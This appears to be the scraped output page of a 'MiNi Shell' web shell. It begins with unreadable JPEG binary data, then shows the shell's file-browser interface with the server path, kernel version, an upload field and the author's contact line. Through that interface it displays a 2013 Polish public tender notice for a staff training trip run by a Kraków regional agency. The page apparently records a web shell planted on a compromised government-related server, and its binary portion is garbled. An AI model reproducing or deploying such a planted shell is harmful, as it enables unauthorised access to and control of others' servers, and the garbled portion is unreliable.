JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130415/146954-N-2013.html

<p class="kh_header"><b>Kraków: Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości</b><br>
<b>Numer ogłoszenia: 146954 - 2013; data zamieszczenia: 15.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolskie Centrum Przedsiębiorczości , ul. Jasnogórska 11, 31-358 Kraków, woj. małopolskie, tel. 12 376 91 00, faks 12 376 91 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcp.malopolska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości. Przedmiot zamówienia współfinansowany jest: - ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego w ramach Pomocy Technicznej Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, - ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Poddziałania 8.2.2 Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 dla projektu Doctus - Małopolski fundusz stypendialny dla doktorantów oraz w ramach Poddziałania 9.1.3 Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 dla projektu Małopolski program stypendialny dla uczniów szczególnie uzdolnionych, - ze środków krajowych (budżet Województwa Małopolskiego i budżet państwa). Tematy szkolenia: 1) Pomoc publiczna - (szkolenie w 1-ym i w 2-gim dniu pobytu, weźmie w nim udział 40 uczestników). 2) Jak przygotować się do audytu zewnętrznego projektów współfinansowanych z funduszy unijnych - (szkolenie w 1-ym i w 2-gim dniu pobytu, weźmie w nim udział 20 uczestników). Zakresy szkolenia: Szkolenie zostanie przeprowadzone w dwóch grupach (łącznie 60 osób). Szkolenie dla pierwszej grupy (40 osób) będzie obejmować temat: Pomoc publiczna. Zakres ww. szkolenia: 1. Podstawy, projekty aktów prawnych regulujących kwestie pomocy publicznej w perspektywie finansowej na lata 2014-2020. 2. Pomoc na rzecz B+R, MŚP, zatrudnienia i szkolenia oraz pomoc regionalna. 3. Pomoc de minimis w nowej perspektywie finansowej na lata 2014-2020. 4. Powiązania faktyczne i prawne beneficjenta pomocy z innymi przedsiębiorstwami a wielkość przyznanej pomocy (np. jednoosobowe działalności gospodarcze w rodzinach, małżeństwach, działające na tym samym rynku, w tej samej siedzibie). 5. Pomoc publiczna w projektach partnerskich w szczególności zasady podziału pomocy w klastarch. 6. Problem kumulacji/łączenia pomocy publicznej (kiedy zachodzi, w jaki sposób weryfikować intensywność pomocy, wiarygodność SHRIMP, konkretne przykłady łączenia pomocy np. dotacja a działalność w specjalnych strefach ekonomicznych bądź inna pomoc o charakterze fiskalnym). 7. Problem dyskontowania pomocy publicznej (czy i jak dyskontować pomoc, konkretne przykłady, w szczególności w pożyczkach i poręczeniach udzielanych przez instrumenty inżynierii finansowej). Szkolenie dla drugiej grupy (20 osób) obejmować będzie temat: Jak przygotować się do audytu zewnętrznego projektów współfinansowanych z funduszy unijnych. Zakres ww. szkolenia: 1. Przedmiot i kryteria oceny audytowanych projektów współfinansowanych z funduszy unijnych. 2. Postępowanie w trakcie audytu: Prawa i obowiązki audytujących i beneficjentów; Sposób prowadzenia audytu; Dobre praktyki z audytów projektów. 3. Doświadczenia z audytów, czyli najczęstsze uchybienia i nieprawidłowości w realizacji projektów - jak zminimalizować obszary ryzyka w realizacji projektu: Procedury projektowe; Kontrola wewnętrzna i system monitoringu; Legalność (prawo krajowe i wspólnotowe); Prawidłowość pod względem księgowym (ścieżka audytu/ślad rewizyjny); Zgodność z umową o dofinansowanie; Realizacja celów, produktów i rezultatów; Zgodność dokumentacji ze stanem faktycznym; Faktyczność poniesienia wydatków; Kwalifikowalność wydatków; Promocja i informacja; Polityki wspólnotowe. 4. Studia przypadków: Jak postępować jeśli wykryjemy błędy, uchybienia lub nieprawidłowości w naszym projekcie; Jakie są możliwe konsekwencje dla beneficjenta i osób zarządzających projektem. 5. Jak przygotować na co dzień dokumentację dla potrzeb audytu projektu: Prawidłowe opisywanie dokumentów finansowo-księgowych - praktyczne uwagi; Jakie dodatkowe dokumenty są niezbędne, aby ustrzec się przed zakwestionowaniem kwalifikowalności wydatków. 6. Wybór audytora zewnętrznego do przeprowadzenia audytu projektu współfinansowanego z funduszy unijnych: Wybór wykonawcy; Zapisy umowy; Ocena raportu i opinii z audytu. Harmonogram szkolenia: I DZIEŃ: 12.00 Wyjazd z parkingu przy siedzibie zamawiającego (Kraków, ul. Jasnogórska 11); 13.00 Przyjazd na miejsce szkolenia; 13.00 - 13.30 Zakwaterowanie; 13.30 - 14.30 Obiad; 14.30 - 16.00 Szkolenie w grupach: Pomoc publiczna / Jak przygotować się do audytu zewnętrznego projektów współfinansowanych z funduszy unijnych; 16.00 - 16.15 Przerwa kawowa; 16.15 - 17.45 Szkolenie w grupach - j.w.; 17.45 - 18.00 Przerwa kawowa; 18.00 - 19.30 Szkolenie w grupach- j.w.; 19.30 - 20.00 Czas wolny; 20.00 Kolacja. II DZIEŃ: 8.30 - 9.30 Śniadanie; 9.30 - 11.00 Szkolenie w grupach: Pomoc publiczna / Jak przygotować się do audytu zewnętrznego projektów współfinansowanych z funduszy unijnych; 11.00 - 11.15 Przerwa kawowa; 11.15 - 12.45 Szkolenie w grupach - j.w.; 12.45 - 13.00 Czas wolny; 13.00 - 13.45 Obiad; 13.45 Wyjazd do Krakowa. Liczba uczestników szkolenia wyjazdowego: 60 osób. Zamawiający ma prawo do zmniejszenia liczby uczestników szkolenia o max 20%, informując o tym Wykonawcę na 3 dni wcześniej przed wykonaniem usługi. Termin szkolenia: od 17 maja 2013 r. do 18 maja 2013 r. Miejsce szkolenia: ośrodek poza Krakowem, w województwie małopolskim, w odległości do 50 km od granic administracyjnych Krakowa. Dodatkowe wymagania: a) Wykonawca winien zorganizować szkolenie w pełnym zakresie, t.j. zapewnić transport z miejsca wyznaczonego przez Zamawiającego na miejsce szkolenia i z powrotem, zakwaterowanie oraz pełne wyżywienie dla 60 osobowej grupy szkoleniowej, w terminie wyznaczonym przez Zamawiającego. b) Wykonawca będzie bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie i obsługę szkolenia, zapewnienie materiałów oraz pomocy szkoleniowych, zapewnienie trenerów szkolenia oraz osoby będącej koordynatorem szkolenia. Koordynator szkolenia musi przebywać (przez okres trwania szkolenia) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i musi dysponować telefonem komórkowym. c) Szkolenie winno posiadać charakter warsztatowy, tzn. prowadzący szkolenie przy posiadanej bogatej wiedzy teoretycznej i praktycznej, przedstawia materiał będący przedmiotem szkolenia oraz na bieżąco w trakcie zajęć odpowiada na pytania i problemy zgłaszane przez uczestników szkolenia. d) Wykonawca zapewni 1 nocleg podczas trwania szkolenia wszystkim 60 uczestnikom w hotelu minimum trzygwiazdkowym, z pełnym wyżywieniem, w pokojach jedno i dwuosobowych z łazienką (4 pokoje jednoosobowe, pozostałe pokoje dwuosobowe). Śniadanie, obiady i kolacja powinny być podawane w innej sali niż sala wykładowa. e) Wykonawca zapewni w miejscu zakwaterowania (pkt d) powyżej) sale wykładowe do przeprowadzenia szkolenia (odpowiednie do ilości uczestników szkolenia) o odpowiedniej wizualizacji i akustyce, wyposażone w rzutnik do prezentacji multimedialnej, laptopa oraz tablicę. f) Wykonawca zapewni dla każdego uczestnika szkolenia (plus dwa dodatkowe kompletne zestawy dla Zamawiającego) materiały szkoleniowe w formie skryptów oraz w wersji elektronicznej na płycie CD dla opisanego zakresu szkolenia objętego umową, a także materiały biurowe, bloki do prowadzenia notatek, teczki oraz szczegółowy program szkolenia. g) Wykonawca zapewni pełne wyżywienie, tj. : 1 śniadanie pełne w formie szwedzkiego stołu; 2 obiady ( zupa + drugie danie mięsne/jarskie + surówki + napoje + deser ); 1 kolacja ( 2 ciepłe dania + przystawki + surówki + napoje ciepłe i zimne ); kawa, herbata, woda mineralna i wyroby cukiernicze w czasie przerw kawowych (2 przerwy kawowe w pierwszym dniu szkolenia oraz 1 przerwa kawowa w drugim dniu). Dla 2 uczestników szkolenia Wykonawca zapewni pełne wyżywienie wegetariańskie. h) W czasie przerw kawowych powinny być podawane wyroby cukiernicze, kawa, herbata, soki, woda mineralna jak również powinien być zapewniony dostęp do łazienek. i) Wykonawca zapewni organizację spotkania integracyjnego po zakończonej kolacji w pierwszym dniu szkolenia. j) Wykonawca zapewni na czas trwania spotkania integracyjnego zimne napoje (woda mineralna, soki). k) Wykonawca zapewni ubezpieczenie NNW dla uczestników szkolenia od pierwszego do ostatniego dnia szkolenia. l) Szkolenie zakończy się wydaniem uczestnikom zaświadczeń potwierdzających udział w odbytym szkoleniu. Wymagania stawiane trenerowi szkolenia: odpowiednie wykształcenie, umiejętności i doświadczenie, dostosowane do tematyki szkolenia; zmiana osoby trenera szkolenia, wskazanej w ofercie będzie możliwa jedynie na zasadach określonych w § 8 projektu umowy, stanowiącego załącznik nr 9 do SIWZ. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.63.20.00-3, 55.10.00.00-1, 55.30.00.00-3, 60.14.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 17.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od obowiązku wnoszenia wadium do przedmiotowego postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał bądź wykonuje co najmniej trzy usługi szkoleniowe o wartości brutto nie mniejszej niż 30 000,00 złotych każda. Do wykazu należy załączyć dowody, czy wskazane usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę dysponowania 2 (dwoma) wykładowcami (trenerami szkolenia), spośród których jeden przeprowadził co najmniej 3 szkolenia o tematyce z zakresu Pomoc publiczna, a drugi przeprowadził co najmniej 3 szkolenia o tematyce z zakresu Audyt zewnętrzny projektów współfinansowanych z funduszy unijnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz szkoleń (przeprowadzonych przez osoby, które będą uczestniczyć w realizacji zamówienia) podlegających ocenie Zamawiającego w ramach kryterium oceny ofert (z wykorzystaniem wzoru stanowiącego załącznik nr 8 do SIWZ). Do wykazu należy załączyć dokumenty potwierdzające, że szkolenia przeprowadzone przez Wykładowcę (trenera szkolenia, wskazanego w ofercie) zostały przez niego wykonane należycie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Kwalifikacje kadry dydaktycznej - szkolenie: Pomoc publiczna - 15</li>
<li>3 - Kwalifikacje kadry dydaktycznej - szkolenie: Jak przygotować się do audytu zewnętrznego projektów współfinansowanych z funduszy unijnych - 15</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/bip/um<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolskie Centrum Przedsiębiorczości ul. Jasnogórska 11, 31-358 Kraków, piętro II pokój 240.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2013 godzina 10:00, miejsce: Małopolskie Centrum Przedsiębiorczości ul. Jasnogórska 11, 31-358 Kraków, piętro II w Sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest: - ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego w ramach Pomocy Technicznej Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, - ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Poddziałania 8.2.2 Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 dla projektu Doctus - Małopolski fundusz stypendialny dla doktorantów oraz w ramach Poddziałania 9.1.3 Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 dla projektu Małopolski program stypendialny dla uczniów szczególnie uzdolnionych, - ze środków krajowych (budżet Województwa Małopolskiego i budżet państwa). Termin realizacji zamówienia: od 17.05.2013 r. do 18.05.2013 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com